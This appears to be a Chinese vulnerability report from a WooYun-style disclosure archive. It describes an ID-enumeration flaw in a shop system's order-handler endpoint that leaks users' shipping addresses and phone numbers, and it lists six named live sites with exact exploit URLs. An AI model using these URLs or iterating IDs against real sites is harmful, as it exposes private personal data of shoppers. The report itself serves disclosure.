### 简要描述: RT ### 详细说明: 前人案例: ``` http://wooyun.org/bugs/wooyun-2010-019206 ``` 泄露地址: ``` /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 ``` 其中ID值为可控的,用BURP不断遍历可以找出非常多的用户信息 案例: ``` http://demo.kuaidiantong.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 http://dj.gzdisc.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.xxsp.me/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.eme.com.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://xn--ehqsq872berelo3bbjl.xn--fiqs8s/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 ``` ### 漏洞证明: ``` http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 ``` [<img src="https://images.seebug.org/upload/201505/26215515fa895b57d5e939e502236242a3130c69.jpg" alt="01.jpg" width="600"...
### 简要描述: RT ### 详细说明: 前人案例: ``` http://wooyun.org/bugs/wooyun-2010-019206 ``` 泄露地址: ``` /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 ``` 其中ID值为可控的,用BURP不断遍历可以找出非常多的用户信息 案例: ``` http://demo.kuaidiantong.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 http://dj.gzdisc.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.xxsp.me/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.eme.com.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://xn--ehqsq872berelo3bbjl.xn--fiqs8s/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 ``` ### 漏洞证明: ``` http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 ``` [<img src="https://images.seebug.org/upload/201505/26215515fa895b57d5e939e502236242a3130c69.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/26215515fa895b57d5e939e502236242a3130c69.jpg) 用BURP遍历一下电话号码 [<img src="https://images.seebug.org/upload/201505/26215528be4f5f00fc2a14bfcbcd4ff6b6d8635e.jpg" alt="02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/26215528be4f5f00fc2a14bfcbcd4ff6b6d8635e.jpg)
